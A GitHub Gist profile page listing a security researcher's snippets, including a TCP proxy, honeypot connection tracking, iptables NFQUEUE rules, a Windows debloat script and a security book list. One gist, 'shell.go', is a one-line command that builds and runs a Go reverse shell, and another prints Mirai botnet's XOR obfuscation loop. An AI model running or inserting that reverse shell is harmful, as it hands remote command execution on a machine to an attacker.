Skip to content

Instantly share code, notes, and snippets.

Mohammad Bilal furusiyya

View GitHub Profile
furusiyya / proxy_copy.go
Created Aug 22, 2016 — forked from jbardin/proxy_copy.go
Go TCP Proxy pattern
View proxy_copy.go
package proxy
import (
func Proxy(srvConn, cliConn *net.TCPConn) {
// channels to wait on the close event for each connection
View Cyber Sec.
# CySecBooks
## Repo Content
- A Guide to Kernel Exploitation Attacking the Core
- Computer Networking A Top-Down Approach
- Fuzzing Brute Force Vulnerability Discovery
- Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009)
- Hacking - The Art of Exploitation, 2nd Ed.
- Metasploit, Penetration Testers Guide
furusiyya / conntrack.go
Created Dec 9, 2016
I only track for NEW TCP events and log their (src ip, src port, dst port) in a non-blocking channel (FIFO queue). When tcp server receive packet, it compare its src ip and src port with channel entries and get destination port of matching one. Same I do udp server.
View conntrack.go
package glutton
import (
const tcpRegExp = `\[\w+]\s+\w+\s+.+?src=(\d+\.\d+\.\d+\.\d+)\s+dst=(\d+\.\d+\.\d+\.\d+)\s+sport=(\d+)\s+dport=(\d+)\s+`
furusiyya /
Created Jan 2, 2017 — forked from singe/
Pythonista script to extract a phone number from copy pasted text, add it to your Contacts if it doesn't exist, then call it.
import re
import clipboard
import console
import webbrowser
import urllib
import contacts
import datetime
import dialogs
def extract_num(input):
furusiyya / MiraiObfuscation
Created Jan 2, 2017
Actual Mirai obfuscation.
View MiraiObfuscation
for (i = 0; i < *len; i++)
 cpy[i] ^= 0xDE;
 cpy[i] ^= 0xAD;
 cpy[i] ^= 0xBE;
 cpy[i] ^= 0xEF;
furusiyya / reclaimWindows10.ps1
Created Jan 10, 2017 — forked from alirobe/reclaimWindows10.ps1
"Reclaim Windows 10" turns off a bunch of unnecessary Windows 10 telemetery, removes bloatware, and privacy invasions. Review and tweak before running. Scripts for reversing are included and commented. Fork via (different defaults)
View reclaimWindows10.ps1
# Win10 Initial Setup Script
# Author: Disassembler <>
# Version: 1.7, 2016-08-15
# dasm's script:
# This script leaves more MS defaults on, including MS security features.
# Tweaked based on personal preferences for @alirobe 2016-11-16 - v1.7.1
View elastic.conf
- "consumer.Http":
Enable: true
ID: ""
Fuse: ""
- "foo"
- "bar"
Address: ":9000"
ReadTimeoutSec: 3
WithHeaders: true
furusiyya / shell.go
Last active Feb 25, 2017 — forked from takeshixx/shell.go
TCP reverse shell | Golang
View shell.go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
View capturingWithNFQ.go
//IPTable rules for capturing ssh packets
//sudo iptables -A INPUT -p tcp --dport 22 -j NFQUEUE --queue-num 0
//sudo iptables -A OUTPUT -p tcp --dport 22 -j NFQUEUE --queue-num 0
//sudo iptables -A FORWARD -p tcp --dport 22 -j NFQUEUE --queue-num 0
package main
import (

Keybase proof

I hereby claim:

  • I am furusiyya on github.
  • I am furusiyya ( on keybase.
  • I have a public key whose fingerprint is 2D55 B75B D686 3D23 55A7 F44F 4C5A 29F8 C638 4CB0

To claim this, I am signing this object:

You can’t perform that action at this time.